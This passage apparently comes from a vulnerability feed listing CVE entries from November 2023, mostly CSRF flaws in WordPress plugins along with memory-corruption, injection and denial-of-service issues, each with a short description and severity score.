Cross-Site Request Forgery (CSRF) vulnerability in Tribulant Newsletters plugin <= 4.8.8 versions.

8.8
2023-11-10 CVE-2023-31077 Myrecorp Cross-Site Request Forgery (CSRF) vulnerability in Myrecorp Export WP Page to Static Html/Css

Cross-Site Request Forgery (CSRF) vulnerability in ReCorp Export WP Page to Static HTML/CSS plugin <= 2.1.9 versions.

8.8
2023-11-10 CVE-2023-31078 Browserupdate Cross-Site Request Forgery (CSRF) vulnerability in Browserupdate WP Browserupdate

Cross-Site Request Forgery (CSRF) vulnerability in Marco Steinbrecher WP BrowserUpdate plugin <= 4.4.1 versions.

8.8
2023-11-10 CVE-2023-6069 Froxlor Link Following vulnerability in Froxlor

Improper Link Resolution Before File Access in GitHub repository froxlor/froxlor prior to 2.1.0.

8.8
2023-11-09 CVE-2023-31086 Ibenic Cross-Site Request Forgery (CSRF) vulnerability in Ibenic Simple Giveaways

Cross-Site Request Forgery (CSRF) vulnerability in Igor Benic Simple Giveaways – Grow your business, email lists and traffic with contests plugin <= 2.46.0 versions.

8.8
2023-11-09 CVE-2023-31088 Floating Action Button Project Cross-Site Request Forgery (CSRF) vulnerability in Floating Action Button Project Floating Action Button

Cross-Site Request Forgery (CSRF) vulnerability in Faraz Quazi Floating Action Button plugin <= 1.2.1 versions.

8.8
2023-11-09 CVE-2023-31093 Chronosly Events Calendar Project Cross-Site Request Forgery (CSRF) vulnerability in Chronosly-Events-Calendar Project Chronosly-Events-Calendar

Cross-Site Request Forgery (CSRF) vulnerability in Chronosly Chronosly Events Calendar plugin <= 2.6.2 versions.

8.8
2023-11-09 CVE-2023-31235 Xnau Cross-Site Request Forgery (CSRF) vulnerability in Xnau Participants Database

Cross-Site Request Forgery (CSRF) vulnerability in Roland Barker, xnau webdesign Participants Database plugin <= 2.4.9 versions.

8.8
2023-11-09 CVE-2023-32092 Peepso Cross-Site Request Forgery (CSRF) vulnerability in Peepso

Cross-Site Request Forgery (CSRF) vulnerability in PeepSo Community by PeepSo – Social Network, Membership, Registration, User Profiles plugin <= 6.0.9.0 versions.

8.8
2023-11-09 CVE-2023-32093 Tpginc Cross-Site Request Forgery (CSRF) vulnerability in Tpginc TPG Redirect

Cross-Site Request Forgery (CSRF) vulnerability in Criss Swaim TPG Redirect plugin <= 1.0.7 versions.

8.8
2023-11-09 CVE-2023-32125 Danielpowney Cross-Site Request Forgery (CSRF) vulnerability in Danielpowney Multi Rating

Cross-Site Request Forgery (CSRF) vulnerability in Daniel Powney Multi Rating plugin <= 5.0.6 versions.

8.8
2023-11-09 CVE-2023-32500 Xtemos Cross-Site Request Forgery (CSRF) vulnerability in Xtemos Woodmart

Cross-Site Request Forgery (CSRF) vulnerability in xtemos WoodMart - Multipurpose WooCommerce Theme <= 7.1.1 versions.

8.8
2023-11-09 CVE-2023-32501 Vikwp Cross-Site Request Forgery (CSRF) vulnerability in Vikwp Vikbooking Hotel Booking Engine & PMS

Cross-Site Request Forgery (CSRF) vulnerability in E4J s.R.L.

8.8
2023-11-09 CVE-2023-32502 Cyberwire Cross-Site Request Forgery (CSRF) vulnerability in Cyberwire PRO Mime Types

Cross-Site Request Forgery (CSRF) vulnerability in Sybre Waaijer Pro Mime Types – Manage file media types plugin <= 1.0.7 versions.

8.8
2023-11-09 CVE-2023-32512 Shortpixel Cross-Site Request Forgery (CSRF) vulnerability in Shortpixel Adaptive Images

Cross-Site Request Forgery (CSRF) vulnerability in ShortPixel ShortPixel Adaptive Images – WebP, AVIF, CDN, Image Optimization plugin <= 3.7.1 versions.

8.8
2023-11-09 CVE-2023-32579 Designsandcode Cross-Site Request Forgery (CSRF) vulnerability in Designsandcode Forget About Shortcode Buttons

Cross-Site Request Forgery (CSRF) vulnerability in Designs & Code Forget About Shortcode Buttons plugin <= 2.1.2 versions.

8.8
2023-11-09 CVE-2023-32587 Wpreactions Cross-Site Request Forgery (CSRF) vulnerability in Wpreactions WP Reactions Lite

Cross-Site Request Forgery (CSRF) vulnerability in WP Reactions, LLC WP Reactions Lite plugin <= 1.3.8 versions.

8.8
2023-11-09 CVE-2023-32592 Fast Search Powered BY Solr Project Cross-Site Request Forgery (CSRF) vulnerability in Fast-Search-Powered-By-Solr Project Fast-Search-Powered-By-Solr

Cross-Site Request Forgery (CSRF) vulnerability in Palasthotel by Edward Bock, Katharina Rompf Sunny Search plugin <= 1.0.2 versions.

8.8
2023-11-09 CVE-2023-32594 E2B Cross-Site Request Forgery (CSRF) vulnerability in E2B Hyphenator

Cross-Site Request Forgery (CSRF) vulnerability in Benedict B., Maciej Gryniuk Hyphenator plugin <= 5.1.5 versions.

8.8
2023-11-09 CVE-2023-32602 Lokalyze Cross-Site Request Forgery (CSRF) vulnerability in Lokalyze Call ME NOW

Cross-Site Request Forgery (CSRF) vulnerability in LOKALYZE CALL ME NOW plugin <= 3.0 versions.

8.8
2023-11-09 CVE-2023-32739 Hamidrezasepehr Cross-Site Request Forgery (CSRF) vulnerability in Hamidrezasepehr Custom Cursors

Cross-Site Request Forgery (CSRF) vulnerability in Web_Trendy WP Custom Cursors | WordPress Cursor Plugin plugin < 3.2 versions.

8.8
2023-11-09 CVE-2023-32744 Woocommerce Cross-Site Request Forgery (CSRF) vulnerability in Woocommerce Product Recommendations

Cross-Site Request Forgery (CSRF) vulnerability in WooCommerce Product Recommendations plugin <= 2.3.0 versions.

8.8
2023-11-09 CVE-2023-32745 Woocommerce Cross-Site Request Forgery (CSRF) vulnerability in Woocommerce Automatewoo

Cross-Site Request Forgery (CSRF) vulnerability in WooCommerce AutomateWoo plugin <= 5.7.1 versions.

8.8
2023-11-09 CVE-2023-32794 Woocommerce Cross-Site Request Forgery (CSRF) vulnerability in Woocommerce Product Addons

Cross-Site Request Forgery (CSRF) vulnerability in WooCommerce Product Add-Ons plugin <= 6.1.3 versions.

8.8
2023-11-09 CVE-2023-34024 Guillemantdavid Cross-Site Request Forgery (CSRF) vulnerability in Guillemantdavid Full Auto Tags Manager

Cross-Site Request Forgery (CSRF) vulnerability in Guillemant David WP Full Auto Tags Manager plugin <= 2.2 versions.

8.8
2023-11-09 CVE-2023-34025 LWS Cross-Site Request Forgery (CSRF) vulnerability in LWS Hide Login

Cross-Site Request Forgery (CSRF) vulnerability in LWS LWS Hide Login plugin <= 2.1.6 versions.

8.8
2023-11-09 CVE-2023-34031 Casier Cross-Site Request Forgery (CSRF) vulnerability in Casier Bbpress Toolkit

Cross-Site Request Forgery (CSRF) vulnerability in Pascal Casier bbPress Toolkit plugin <= 1.0.12 versions.

8.8
2023-11-09 CVE-2023-34033 Malinky Cross-Site Request Forgery (CSRF) vulnerability in Malinky Malinky-Ajax-Pagination

Cross-Site Request Forgery (CSRF) vulnerability in Malinky Ajax Pagination and Infinite Scroll plugin <= 2.0.1 versions.

8.8
2023-11-09 CVE-2023-34169 Sakura Cross-Site Request Forgery (CSRF) vulnerability in Sakura TS Webfonts for Sakura

Cross-Site Request Forgery (CSRF) vulnerability in SAKURA Internet Inc.

8.8
2023-11-09 CVE-2023-34171 Esiteq Cross-Site Request Forgery (CSRF) vulnerability in Esiteq WP Report Post 2.1.2

Cross-Site Request Forgery (CSRF) vulnerability in Alex Raven WP Report Post plugin <= 2.1.2 versions.

8.8
2023-11-09 CVE-2023-34177 Kenthhagstrom Cross-Site Request Forgery (CSRF) vulnerability in Kenthhagstrom Wp-Cachecom

Cross-Site Request Forgery (CSRF) vulnerability in Kenth Hagström WP-Cache.Com plugin <= 1.1.1 versions.

8.8
2023-11-09 CVE-2023-5539 Moodle
Fedoraproject
Code Injection vulnerability in multiple products

A remote code execution risk was identified in the Lesson activity.

8.8
2023-11-09 CVE-2023-5540 Moodle
Fedoraproject
Code Injection vulnerability in multiple products

A remote code execution risk was identified in the IMSCP activity.

8.8
2023-11-09 CVE-2023-34178 Groundhogg Cross-Site Request Forgery (CSRF) vulnerability in Groundhogg

Cross-Site Request Forgery (CSRF) vulnerability in Groundhogg Inc.

8.8
2023-11-09 CVE-2023-34181 WP Cirrus Project Cross-Site Request Forgery (CSRF) vulnerability in Wp-Cirrus Project Wp-Cirrus 0.6.11

Cross-Site Request Forgery (CSRF) vulnerability in WP-Cirrus plugin <= 0.6.11 versions.

8.8
2023-11-09 CVE-2023-34182 Shawfactor Cross-Site Request Forgery (CSRF) vulnerability in Shawfactor Lh-Password-Changer

Cross-Site Request Forgery (CSRF) vulnerability in Peter Shaw LH Password Changer plugin <= 1.55 versions.

8.8
2023-11-09 CVE-2023-34371 Spamreferrerblock Project Cross-Site Request Forgery (CSRF) vulnerability in Spamreferrerblock Project Spamreferrerblock 2.22

Cross-Site Request Forgery (CSRF) vulnerability in Didier Sampaolo SpamReferrerBlock plugin <= 2.22 versions.

8.8
2023-11-09 CVE-2023-47237 Auto Publish FOR Google MY Business Project Cross-Site Request Forgery (CSRF) vulnerability in Auto Publish for Google MY Business Project Auto Publish for Google MY Business

Cross-Site Request Forgery (CSRF) vulnerability in Martin Gibson Auto Publish for Google My Business plugin <= 3.7 versions.

8.8
2023-11-09 CVE-2023-47238 Webberzone Cross-Site Request Forgery (CSRF) vulnerability in Webberzone TOP 10

Cross-Site Request Forgery (CSRF) vulnerability in WebberZone Top 10 – WordPress Popular posts by WebberZone plugin <= 3.3.2 versions.

8.8
2023-11-09 CVE-2023-25975 Etsy Shop Project Cross-Site Request Forgery (CSRF) vulnerability in Etsy Shop Project Etsy Shop

Cross-Site Request Forgery (CSRF) vulnerability in Frédéric Sheedy Etsy Shop plugin <= 3.0.3 versions.

8.8
2023-11-09 CVE-2023-31087 Joomsky Cross-Site Request Forgery (CSRF) vulnerability in Joomsky JS JOB Manager

Cross-Site Request Forgery (CSRF) vulnerability in JoomSky JS Job Manager plugin <= 2.0.0 versions.

8.8
2023-11-09 CVE-2023-34002 Wpinventory Cross-Site Request Forgery (CSRF) vulnerability in Wpinventory WP Inventory Manager

Cross-Site Request Forgery (CSRF) vulnerability in WP Inventory Manager plugin <= 2.1.0.13 versions.

8.8
2023-11-09 CVE-2023-34386 Wpclever Cross-Site Request Forgery (CSRF) vulnerability in Wpclever WPC Smart Wishlist for Woocommerce

Cross-Site Request Forgery (CSRF) vulnerability in WPClever WPC Smart Wishlist for WooCommerce plugin <= 4.7.1 versions.

8.8
2023-11-09 CVE-2023-46614 Matbao Cross-Site Request Forgery (CSRF) vulnerability in Matbao WP Helper Premium

Cross-Site Request Forgery (CSRF) vulnerability in Mat Bao Corp WP Helper Premium plugin <= 4.5.1 versions.

8.8
2023-11-09 CVE-2023-25994 Publish TO Schedule Project Cross-Site Request Forgery (CSRF) vulnerability in Publish to Schedule Project Publish to Schedule

Cross-Site Request Forgery (CSRF) vulnerability in Alex Benfica Publish to Schedule plugin <= 4.4.2 versions.

8.8
2023-11-09 CVE-2023-40054 Solarwinds Path Traversal vulnerability in Solarwinds Network Configuration Manager

The Network Configuration Manager was susceptible to a Directory Traversal Remote Code Execution Vulnerability.

8.8
2023-11-09 CVE-2023-40055 Solarwinds Path Traversal vulnerability in Solarwinds Network Configuration Manager

The Network Configuration Manager was susceptible to a Directory Traversal Remote Code Execution Vulnerability.

8.8
2023-11-09 CVE-2023-43791 Humansignal Information Exposure vulnerability in Humansignal Label Studio

Label Studio is a multi-type data labeling and annotation tool with standardized output format.

8.8
2023-11-09 CVE-2021-43609 Spiceworks SQL Injection vulnerability in Spiceworks Help Desk Server

An issue was discovered in Spiceworks Help Desk Server before 1.3.3.

8.8
2023-11-08 CVE-2023-5996 Google
Debian
Fedoraproject
Use After Free vulnerability in multiple products

Use after free in WebAudio in Google Chrome prior to 119.0.6045.123 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.

8.8
2023-11-08 CVE-2023-47107 THM Weak Password Recovery Mechanism for Forgotten Password vulnerability in THM Pilos

PILOS is an open source front-end for BigBlueButton servers with a built-in load balancer.

8.8
2023-11-08 CVE-2023-39913 Apache Deserialization of Untrusted Data vulnerability in Apache Uimaj

Deserialization of Untrusted Data, Improper Input Validation vulnerability in Apache UIMA Java SDK, Apache UIMA Java SDK, Apache UIMA Java SDK, Apache UIMA Java SDK.This issue affects Apache UIMA Java SDK: before 3.5.0. Users are recommended to upgrade to version 3.5.0, which fixes the issue. There are several locations in the code where serialized Java objects are deserialized without verifying the data.

8.8
2023-11-07 CVE-2023-45380 Silbersaiten Authorization Bypass Through User-Controlled Key vulnerability in Silbersaiten Order Duplicator 1.1.7

In the module "Order Duplicator " Clone and Delete Existing Order" (orderduplicate) in version <= 1.1.7 from Silbersaiten for PrestaShop, a guest can download personal information without restriction.

8.8
2023-11-07 CVE-2023-46243 Xwiki Code Injection vulnerability in Xwiki

XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it.

8.8
2023-11-07 CVE-2023-46242 Xwiki Cross-Site Request Forgery (CSRF) vulnerability in Xwiki

XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it.

8.8
2023-11-07 CVE-2023-46244 Xwiki Incorrect Authorization vulnerability in Xwiki

XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it.

8.8
2023-11-07 CVE-2022-38702 Kigurumi Improper Neutralization of Formula Elements in a CSV File vulnerability in Kigurumi CSV Exporter

Improper Neutralization of Formula Elements in a CSV File vulnerability in Nakashima Masahiro WP CSV Exporter.This issue affects WP CSV Exporter: from n/a through 2.0.

8.8
2023-11-07 CVE-2022-41616 Kaushikkalathiya Improper Neutralization of Formula Elements in a CSV File vulnerability in Kaushikkalathiya Export Users Data

Improper Neutralization of Formula Elements in a CSV File vulnerability in Kaushik Kalathiya Export Users Data CSV.This issue affects Export Users Data CSV: from n/a through 2.1.

8.8
2023-11-07 CVE-2022-42882 Shambix Improper Neutralization of Formula Elements in a CSV File vulnerability in Shambix Simple Csv/Xls Exporter

Improper Neutralization of Formula Elements in a CSV File vulnerability in Shambix Simple CSV/XLS Exporter.This issue affects Simple CSV/XLS Exporter: from n/a through 1.5.8.

8.8
2023-11-07 CVE-2022-44738 Patrickrobrecht Improper Neutralization of Formula Elements in a CSV File vulnerability in Patrickrobrecht Posts and Users Stats

Improper Neutralization of Formula Elements in a CSV File vulnerability in Patrick Robrecht Posts and Users Stats.This issue affects Posts and Users Stats: from n/a through 1.1.3.

8.8
2023-11-07 CVE-2022-47181 Wpexperts Cross-Site Request Forgery (CSRF) vulnerability in Wpexperts Email Templates Customizer and Designer

Cross-Site Request Forgery (CSRF) vulnerability in wpexpertsio Email Templates Customizer and Designer for WordPress and WooCommerce email-templates allows Cross Site Request Forgery.This issue affects Email Templates Customizer and Designer for WordPress and WooCommerce: from n/a through 1.4.2.

8.8
2023-11-07 CVE-2023-41798 Wpwax Improper Neutralization of Formula Elements in a CSV File vulnerability in Wpwax Directorist

Improper Neutralization of Formula Elements in a CSV File vulnerability in wpWax Directorist – WordPress Business Directory Plugin with Classified Ads Listing.This issue affects Directorist – WordPress Business Directory Plugin with Classified Ads Listings: from n/a through 7.7.1.

8.8
2023-11-07 CVE-2023-46730 Group Office Server-Side Request Forgery (SSRF) vulnerability in Group-Office Group Office

Group-Office is an enterprise CRM and groupware tool.

8.8
2023-11-07 CVE-2022-45348 Anmari Improper Neutralization of Formula Elements in a CSV File vulnerability in Anmari AMR Users

Improper Neutralization of Formula Elements in a CSV File vulnerability in anmari amr users.This issue affects amr users: from n/a through 4.59.4.

8.8
2023-11-07 CVE-2022-46804 Narolainfotech Improper Neutralization of Formula Elements in a CSV File vulnerability in Narolainfotech Export Users Data Distinct

Improper Neutralization of Formula Elements in a CSV File vulnerability in Narola Infotech Solutions LLP Export Users Data Distinct.This issue affects Export Users Data Distinct: from n/a through 1.3.

8.8
2023-11-07 CVE-2022-46821 Jackmail Improper Neutralization of Formula Elements in a CSV File vulnerability in Jackmail

Improper Neutralization of Formula Elements in a CSV File vulnerability in Jackmail & Sarbacane Emails & Newsletters with Jackmail.This issue affects Emails & Newsletters with Jackmail: from n/a through 1.2.22.

8.8
2023-11-07 CVE-2023-25983 Liquidweb Improper Neutralization of Formula Elements in a CSV File vulnerability in Liquidweb KB Support

Improper Neutralization of Formula Elements in a CSV File vulnerability in WPOmnia KB Support.This issue affects KB Support: from n/a through 1.5.84.

8.8
2023-11-07 CVE-2023-36527 Bestwebsoft Improper Neutralization of Formula Elements in a CSV File vulnerability in Bestwebsoft Post to CSV

Improper Neutralization of Formula Elements in a CSV File vulnerability in BestWebSoft Post to CSV by BestWebSoft.This issue affects Post to CSV by BestWebSoft: from n/a through 1.4.0.

8.8
2023-11-07 CVE-2023-42659 Progress Unrestricted Upload of File with Dangerous Type vulnerability in Progress WS FTP Server

In WS_FTP Server versions prior to 8.7.6 and 8.8.4, an unrestricted file upload flaw has been identified.

8.8
2023-11-07 CVE-2022-45350 Simple History Improper Neutralization of Formula Elements in a CSV File vulnerability in Simple-History Simple History

Improper Neutralization of Formula Elements in a CSV File vulnerability in Pär Thernström Simple History – user activity log, audit tool.This issue affects Simple History – user activity log, audit tool: from n/a through 3.3.1.

8.8
2023-11-07 CVE-2022-47442 Ayecode Improper Neutralization of Formula Elements in a CSV File vulnerability in Ayecode Userswp

Improper Neutralization of Formula Elements in a CSV File vulnerability in AyeCode Ltd UsersWP.This issue affects UsersWP: from n/a through 1.2.3.9.

8.8
2023-11-07 CVE-2023-33480 Remoteclinic Unrestricted Upload of File with Dangerous Type vulnerability in Remoteclinic Remote Clinic 2.0

RemoteClinic 2.0 contains a critical vulnerability chain that can be exploited by a remote attacker with low-privileged user credentials to create admin users, escalate privileges, and execute arbitrary code on the target system via a PHP shell.

8.8
2023-11-07 CVE-2023-28572 Qualcomm Out-of-bounds Write vulnerability in Qualcomm products

Memory corruption in WLAN HOST while processing the WLAN scan descriptor list.

8.8
2023-11-06 CVE-2023-47004 Redislabs Out-of-bounds Write vulnerability in Redislabs Redisgraph

Buffer Overflow vulnerability in Redis RedisGraph v.2.x through v.2.12.8 and fixed in v.2.12.9 allows an attacker to execute arbitrary code via the code logic after valid authentication.

8.8
2023-11-06 CVE-2023-44398 Exiv2 Out-of-bounds Write vulnerability in Exiv2 0.28.0

Exiv2 is a C++ library and a command-line utility to read, write, delete and modify Exif, IPTC, XMP and ICC image metadata.

8.8
2023-11-06 CVE-2023-46776 Josie Cross-Site Request Forgery (CSRF) vulnerability in Josie Auto Excerpt Everywhere

Cross-Site Request Forgery (CSRF) vulnerability in Serena Villa Auto Excerpt everywhere plugin <= 1.5 versions.

8.8
2023-11-06 CVE-2023-46777 Featherplugins Cross-Site Request Forgery (CSRF) vulnerability in Featherplugins Custom Login Page | Temporary Users | Rebrand Login | Login Captcha

Cross-Site Request Forgery (CSRF) vulnerability in Custom Login Page | Temporary Users | Rebrand Login | Login Captcha plugin <= 1.1.3 versions.

8.8
2023-11-06 CVE-2023-46778 Thefreewindows Cross-Site Request Forgery (CSRF) vulnerability in Thefreewindows Auto Limit Posts Reloaded

Cross-Site Request Forgery (CSRF) vulnerability in TheFreeWindows Auto Limit Posts Reloaded plugin <= 2.5 versions.

8.8
2023-11-06 CVE-2023-46779 Easyrecipe Project Cross-Site Request Forgery (CSRF) vulnerability in Easyrecipe Project Easyrecipe

Cross-Site Request Forgery (CSRF) vulnerability in EasyRecipe plugin <= 3.5.3251 versions.

8.8
2023-11-06 CVE-2023-46780 Altersoftware Cross-Site Request Forgery (CSRF) vulnerability in Altersoftware Alter

Cross-Site Request Forgery (CSRF) vulnerability in Alter plugin <= 1.0 versions.

8.8
2023-11-06 CVE-2023-46781 Rolandmurg Cross-Site Request Forgery (CSRF) vulnerability in Rolandmurg Current Menu Item for Custom Post Types

Cross-Site Request Forgery (CSRF) vulnerability in Roland Murg Current Menu Item for Custom Post Types plugin <= 1.5 versions.

8.8
2023-11-06 CVE-2023-47186 Kadencewp Cross-Site Request Forgery (CSRF) vulnerability in Kadencewp Kadence Woocommerce Email Designer

Cross-Site Request Forgery (CSRF) vulnerability in Kadence WP Kadence WooCommerce Email Designer plugin <= 1.5.11 versions.

8.8
2023-11-06 CVE-2023-5823 Themekraft Cross-Site Request Forgery (CSRF) vulnerability in Themekraft TK Google Fonts Gdpr Compliant

Cross-Site Request Forgery (CSRF) vulnerability in ThemeKraft TK Google Fonts GDPR Compliant plugin <= 2.2.11 versions.

8.8
2023-11-06 CVE-2023-46775 Zixn Cross-Site Request Forgery (CSRF) vulnerability in Zixn Original Texts Yandex Webmaster

Cross-Site Request Forgery (CSRF) vulnerability in Djo Original texts Yandex WebMaster plugin <= 1.18 versions.

8.8
2023-11-06 CVE-2023-4996 Netskope Improper Preservation of Permissions vulnerability in Netskope

Netskope was made aware of a security vulnerability in its NSClient product for version 100 & prior where a malicious non-admin user can disable the Netskope client by using a specially-crafted package.

8.8
2023-11-06 CVE-2023-46084 Bplugins SQL Injection vulnerability in Bplugins Icons Font Loader 1.0/1.1.2

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in bPlugins LLC Icons Font Loader allows SQL Injection.This issue affects Icons Font Loader: from n/a through 1.1.2.

8.8
2023-11-06 CVE-2023-47182 Nazmulhossainnihal Cross-Site Request Forgery (CSRF) vulnerability in Nazmulhossainnihal Login Screen Manager

Cross-Site Request Forgery (CSRF) leading to a Stored Cross-Site Scripting (XSS) vulnerability in Nazmul Hossain Nihal Login Screen Manager plugin <= 3.5.2 versions.

8.8
2023-11-08 CVE-2023-47109 Prestashop Unspecified vulnerability in Prestashop Customer Reassurance Block

PrestaShop blockreassurance adds an information block aimed at offering helpful information to reassure customers that the store is trustworthy.

8.1
2023-11-07 CVE-2023-43885 Tenda Missing Authorization vulnerability in Tenda RX9 PRO Firmware 22.03.02.10

Missing error handling in the HTTP server component of Tenda RX9 Pro Firmware V22.03.02.20 allows authenticated attackers to arbitrarily lock the device.

8.1
2023-11-06 CVE-2023-5355 Getawesomesupport Path Traversal vulnerability in Getawesomesupport Awesome Support

The Awesome Support WordPress plugin before 6.1.5 does not sanitize file paths when deleting temporary attachment files, allowing a ticket submitter to delete arbitrary files on the server.

8.1
2023-11-12 CVE-2023-28134 Checkpoint Incorrect Permission Assignment for Critical Resource vulnerability in Checkpoint Endpoint Security E84/E85/E86

Local attacker can escalate privileges on affected installations of Check Point Harmony Endpoint/ZoneAlarm Extreme Security.

7.8
2023-11-10 CVE-2023-47611 Telit Unspecified vulnerability in Telit products

A CWE-269: Improper Privilege Management vulnerability exists in Telit Cinterion BGS5, Telit Cinterion EHS5/6/8, Telit Cinterion PDS5/6/8, Telit Cinterion ELS61/81, Telit Cinterion PLS62 that could allow a local, low privileged attacker to elevate privileges to "manufacturer" level on the targeted system.

7.8
2023-11-09 CVE-2023-47489 Combodo Unspecified vulnerability in Combodo Itop 3.1.0211973

CSV injection in export as csv in Combodo iTop v.3.1.0-2-11973 allows a local attacker to execute arbitrary code via a crafted script to the export-v2.php and ajax.render.php components.

7.8
2023-11-08 CVE-2023-4632 Lenovo Uncontrolled Search Path Element vulnerability in Lenovo System Update

An uncontrolled search path vulnerability was reported in Lenovo System Update that could allow an attacker with local access to execute code with elevated privileges.

7.8
2023-11-08 CVE-2023-4706 Lenovo Unspecified vulnerability in Lenovo Preload Directory

A privilege escalation vulnerability was reported in Lenovo preloaded devices deployed using Microsoft AutoPilot under a standard user account due to incorrect default privileges.

7.8
2023-11-07 CVE-2023-42361 Midori Global Server-Side Request Forgery (SSRF) vulnerability in Midori-Global Better PDF Exporter 10.0.0

Local File Inclusion vulnerability in Midori-global Better PDF Exporter for Jira Server and Jira Data Center v.10.3.0 and before allows an attacker to view arbitrary files and cause other impacts via use of crafted image during PDF export.

7.8
2023-11-07 CVE-2023-3889 ARM Improper Restriction of Operations within the Bounds of a Memory Buffer vulnerability in ARM Valhall GPU Kernel Driver

A local non-privileged user can make improper GPU memory processing operations.

7.8
2023-11-07 CVE-2023-4295 ARM Use After Free vulnerability in ARM Mali GPU Kernel Driver and Valhall GPU Kernel Driver

A local non-privileged user can make improper GPU memory processing operations to gain access to already freed memory.

7.8
2023-11-07 CVE-2023-5179 Opendesign Out-of-bounds Read vulnerability in Opendesign Drawings SDK

An issue was discovered in Open Design Alliance Drawings SDK before 2024.10.

7.8
2023-11-07 CVE-2023-30739 Samsung Unspecified vulnerability in Samsung Android 11.0/12.0

Arbitrary File Descriptor Write vulnerability in libsec-ril prior to SMR Nov-2023 Release 1 allows local attacker to execute arbitrary code.

7.8
2023-11-07 CVE-2023-42528 Samsung Out-of-bounds Write vulnerability in Samsung Android 11.0/12.0

Improper Input Validation vulnerability in ProcessNvBuffering of libsec-ril prior to SMR Nov-2023 Release 1 allows local attacker to execute arbitrary code.

7.8
2023-11-07 CVE-2023-42529 Samsung Out-of-bounds Write vulnerability in Samsung Android 11.0/12.0

Out-of-bound write vulnerability in libsec-ril prior to SMR Nov-2023 Release 1 allows local attackers to execute arbitrary code.

7.8
2023-11-07 CVE-2023-42535 Samsung Out-of-bounds Write vulnerability in Samsung Android 12.0/13.0

Out-of-bounds Write in read_block of vold prior to SMR Nov-2023 Release 1 allows local attacker to execute arbitrary code.

7.8
2023-11-07 CVE-2023-42536 Samsung Out-of-bounds Write vulnerability in Samsung Android 11.0/12.0

An improper input validation in saped_dec in libsaped prior to SMR Nov-2023 Release 1 allows local attackers to cause out-of-bounds read and write.

7.8
2023-11-07 CVE-2023-42537 Samsung Out-of-bounds Write vulnerability in Samsung Android 11.0/12.0

An improper input validation in get_head_crc in libsaped prior to SMR Nov-2023 Release 1 allows local attackers to cause out-of-bounds read and write.

7.8
2023-11-07 CVE-2023-42538 Samsung Out-of-bounds Write vulnerability in Samsung Android 11.0/12.0

An improper input validation in saped_rec_silence in libsaped prior to SMR Nov-2023 Release 1 allows local attackers to cause out-of-bounds read and write.

7.8
2023-11-07 CVE-2023-21671 Qualcomm Unspecified vulnerability in Qualcomm products

Memory Corruption in Core during syscall for Sectools Fuse comparison feature.

7.8
2023-11-07 CVE-2023-24852 Qualcomm Out-of-bounds Write vulnerability in Qualcomm products

Memory Corruption in Core due to secure memory access by user while loading modem image.

7.8
2023-11-07 CVE-2023-28545 Qualcomm Out-of-bounds Write vulnerability in Qualcomm products

Memory corruption in TZ Secure OS while loading an app ELF.

7.8
2023-11-07 CVE-2023-28556 Qualcomm Unspecified vulnerability in Qualcomm products

Cryptographic issue in HLOS during key management.

7.8
2023-11-07 CVE-2023-28570 Qualcomm Out-of-bounds Write vulnerability in Qualcomm products

Memory corruption while processing audio effects.

7.8
2023-11-07 CVE-2023-28574 Qualcomm Out-of-bounds Write vulnerability in Qualcomm products

Memory corruption in core services when Diag handler receives a command to configure event listeners.

7.8
2023-11-07 CVE-2023-33031 Qualcomm Out-of-bounds Write vulnerability in Qualcomm products

Memory corruption in Automotive Audio while copying data from ADSP shared buffer to the VOC packet data buffer.

7.8
2023-11-07 CVE-2023-33055 Qualcomm Out-of-bounds Write vulnerability in Qualcomm products

Memory Corruption in Audio while invoking callback function in driver from ADSP.

7.8
2023-11-07 CVE-2023-33059 Qualcomm Out-of-bounds Write vulnerability in Qualcomm products

Memory corruption in Audio while processing the VOC packet data from ADSP.

7.8
2023-11-07 CVE-2023-33074 Qualcomm Out-of-bounds Write vulnerability in Qualcomm products

Memory corruption in Audio when SSR event is triggered after music playback is stopped.

7.8
2023-11-07 CVE-2023-41036 Macvim Improper Privilege Management vulnerability in Macvim

Macvim is a text editor for MacOS.

7.8
2023-11-06 CVE-2023-32837 Google Out-of-bounds Write vulnerability in Google Android 12.0

In video, there is a possible out of bounds write due to a missing bounds check.

7.8
2023-11-06 CVE-2023-3399 Gitlab Unspecified vulnerability in Gitlab

An issue has been discovered in GitLab EE affecting all versions starting from 11.6 before 16.3.6, all versions starting from 16.4 before 16.4.2, all versions starting from 16.5 before 16.5.1.

7.7
2023-11-11 CVE-2023-47390 Juanfont Information Exposure Through Log Files vulnerability in Juanfont Headscale

Headscale through 0.22.3 writes bearer tokens to info-level logs.

7.5
2023-11-11 CVE-2023-46849 Openvpn
Debian
Fedoraproject
Divide By Zero vulnerability in multiple products

Using the --fragment option in certain configuration setups OpenVPN version 2.6.0 to 2.6.6 allows an attacker to trigger a divide by zero behaviour which could cause an application crash, leading to a denial of service.

7.5
2023-11-10 CVE-2023-47108 Opentelemetry Allocation of Resources Without Limits or Throttling vulnerability in Opentelemetry

OpenTelemetry-Go Contrib is a collection of third-party packages for OpenTelemetry-Go.

7.5
2023-11-10 CVE-2023-47120 Discourse Allocation of Resources Without Limits or Throttling vulnerability in Discourse 3.1.0/3.1.1/3.2.0

Discourse is an open source platform for community discussion.

7.5
2023-11-10 CVE-2023-6076 Phpgurukul Unspecified vulnerability in PHPgurukul Restaurant Table Booking System 1.0

A vulnerability classified as problematic was found in PHPGurukul Restaurant Table Booking System 1.0.

7.5
2023-11-09 CVE-2018-8863 Philips Unspecified vulnerability in Philips Encoreanywhere

The HTTP header in Philips EncoreAnywhere contains data an attacker may be able to use to gain sensitive information.

7.5
2023-11-09 CVE-2023-4379 Gitlab Unspecified vulnerability in Gitlab

An issue has been discovered in GitLab EE affecting all versions starting from 15.3 prior to 16.2.8, 16.3 prior to 16.3.5, and 16.4 prior to 16.4.1.

7.5
2023-11-09 CVE-2023-5954 Hashicorp Memory Leak vulnerability in Hashicorp Vault

HashiCorp Vault and Vault Enterprise inbound client requests triggering a policy check can lead to an unbounded consumption of memory.

7.5
2023-11-09 CVE-2023-45283 Golang Path Traversal vulnerability in Golang GO

The filepath package does not recognize paths with a \??\ prefix as special.

7.5
2023-11-09 CVE-2023-46894 Espressif Inadequate Encryption Strength vulnerability in Espressif Esptool 4.6.2

An issue discovered in esptool 4.6.2 allows attackers to view sensitive information via weak cryptographic algorithm.

7.5
2023-11-09 CVE-2023-26156 Chromedriver Project OS Command Injection vulnerability in Chromedriver Project Chromedriver

